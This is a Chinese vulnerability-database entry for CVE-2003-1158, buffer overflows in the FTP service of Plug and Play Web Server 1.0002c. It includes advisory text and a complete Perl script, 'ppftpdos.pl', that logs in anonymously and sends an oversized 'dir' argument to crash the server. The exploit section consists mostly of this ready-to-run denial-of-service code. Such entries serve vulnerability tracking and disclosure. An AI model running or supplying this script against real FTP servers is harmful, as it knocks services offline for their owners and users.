多个Plug And Play Web Server文件传输协议服务命令处理缓冲区溢出漏洞

多个Plug And Play Web Server文件传输协议服务命令处理缓冲区溢出漏洞

漏洞ID 1107491 漏洞类型 缓冲区溢出
发布时间 2003-09-21 更新时间 2005-10-20
图片[1]-多个Plug And Play Web Server文件传输协议服务命令处理缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-1158
图片[2]-多个Plug And Play Web Server文件传输协议服务命令处理缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200312-141
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23166
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-141
|漏洞详情
PlugandPlayWebServer1.0002c版本的的文件传输协议服务存在多个缓冲区溢出漏洞。远程攻击者借助超长(1)dir,(2)ls,(3)delete,(4)mkdir,(5)DELE,(6)RMD,或者(7)MKD命令导致服务拒绝(崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/8667/info

Plug and Play Web Server FTP service has been reported prone to multiple buffer overflow issues, the issues present themselves when the affected FTP service handles FTP command arguments of excessive size.

It has been demonstrated that a remote attacker may exploit this condition to trigger a denial of service in the affected FTP server. However, due to the nature of this vulnerability, although unconfirmed, it has been conjectured that a remote attacker may leverage this vulnerability to have arbitrary code executed in the context of the vulnerable service. 

#!/usr/bin/perl
# ppftpdos.pl - Remote denial of service against Plug & Play FTP server

use Net::FTP;

$host = $ARGV[0];

$buffer = "A"x540;

if("$ARGV[0]" eq "") {
        print("DOS against Plug & Play FTP Server by Bahaa Naamnehn");
        print("[email protected] - http://www.bsecurity.tkn");
        print("====================================================n");
        die("Usage : ./PPftpdos <host/ip>n");
} else {

        print("Connecting to $host...n");
        my $ftp = Net::FTP->new($host) or die "Couldn't connect to
$hostn";
        print("Connected!n");

        $username = "anonymous";
        $password = "anonymous";

        $ftp->login($username, $password)
        or die "Could not log in.n";

        $ftp->dir($buffer);

        $ftp->quit();

        print("Success!n");
}
|参考资料
http://archives.neohapsis.com/archives/bugtraq/2003-09/0275.html※http://www.securityfocus.com/bid/8667※http://xforce.iss.net/xforce/xfdb/13219※http://www.securityfocus.com/data/vulnerabilities/exploits/ppftpdos.pl※

相关推荐: Bookmark4U远程文件包含漏洞

Bookmark4U远程文件包含漏洞 漏洞ID 1202143 漏洞类型 代码注入 发布时间 2003-12-31 更新时间 2003-12-31 CVE编号 CVE-2003-1253 CNNVD-ID CNNVD-200312-354 漏洞平台 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享